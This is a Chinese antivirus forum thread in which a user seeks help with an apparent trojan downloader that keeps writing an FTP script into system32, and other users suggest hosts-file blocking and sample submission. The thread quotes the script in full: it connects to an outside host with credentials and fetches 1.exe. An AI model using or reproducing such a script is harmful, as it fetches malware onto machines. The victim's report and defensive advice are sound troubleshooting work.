瑞星卡卡安全论坛

C:\WINDOWS\system32 老是多点什么,比如现在的
1mm.txt
open ggxi.3322.org 
bbs
110
binary
get 1.exe
bye
防火墙已禁止　cmd.exe cmdkey.exe ftp.exe conime.exe cys.exe
好象有点用，但根源一直找不到
SREng日志　附下，万望高手教我


[用户系统信息]Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)


附件: 9839342007125105755.rar

...

SREng日志里，看不出什么异常！

把这些文件发到http://up.rising.com.cn/webmail/uploadnew.htm，瑞星会马上回复你的

老是　自己启动　ftp.exe 下载点东西到我机器里
目前我已禁止了　cmd.exe cmdkey.exe ftp.exe conime.exe cys.exe

在系统hosts文件的127.0.0.1      localhost后面加上下面一行，先把已知毒源屏蔽掉，再找原因。
127.0.0.1ggxi.3322.org

提交的扫描日志让帮忙分析的，描述里也说的很明白，然后回的信息居然是
------------------------------
尊敬的客户，您好！
    您的邮件已经收到，感谢您对瑞星的支持。

    我们已经详细分析过您的问题和文件，以下是您上传的文件的分析结果：
    1.文件名：SREngLOG.log
    不是病毒



注意：如果您上报的文件损坏或者压缩包有密码保护，会导致我们无法正确分析，请您确认文件正常且压缩包中无密码后再提交。
如有问题，您可以通邮件服务中心与我们联系，详细描述您的问题，并且提供此封邮件主题中的流水单号以及上报所用的电子邮件地址。
提 醒：为保证收到您的来信，请勿直接回复本邮件!!!
-------------------------------------------------------------
发送邮件：请用IE等浏览器访问网址 http://csc.rising.com.cn
-------------------------------------------------------------

引用:

【月亮崽崽的贴子】提交的扫描日志让帮忙分析的，描述里也说的很明白，然后回的信息居然是 ------------------------------ 尊敬的客户，您好！     您的邮件已经收到，感谢您对瑞星的支持。     我们已经详细分析过您的问题和文件，以下是您上传的文件的分析结果：     1.文件名：SREngLOG.log     不是病毒 注意：如果您上报的文件损坏或者压缩包有密码保护，会导致我们无法正确分析，请您确认文件正常且压缩包中无密码后再提交。 如有问题，您可以通邮件服务中心与我们联系，详细描述您的问题，并且提供此封邮件主题中的流水单号以及上报所用的电子邮件地址。 提 醒：为保证收到您的来信，请勿直接回复本邮件!!! ------------------------------------------------------------- 发送邮件：请用IE等浏览器访问网址 http://csc.rising.com.cn ------------------------------------------------------------- ………………

首先说明我仅是普通用户。你提交的SREng.log当然不会是病毒，它仅为一文本文件。如果要向杀软厂商提供病毒样本，建议将可疑的后缀名为exe文件上报，而不是什么扫描日志；扫描日志主要是提供给论坛上的网友分析用的。

建议您咨询瑞星客服　请他们协助解决问题 
瑞星客户服务中心：http://csc.rising.com.cn 
瑞星邮件服务中心：http://up.rising.com.cn/webmail/index.htm 
瑞星在线专家门诊：http://help.rising.com.cn/help/RSZX.html 
瑞星在线专家门诊很方便

上传日志干什么?上传你认为是病毒的东西?

难道是木马下载者？

个人本来断定是灰鸽子
如果是下载者如何杀？

ai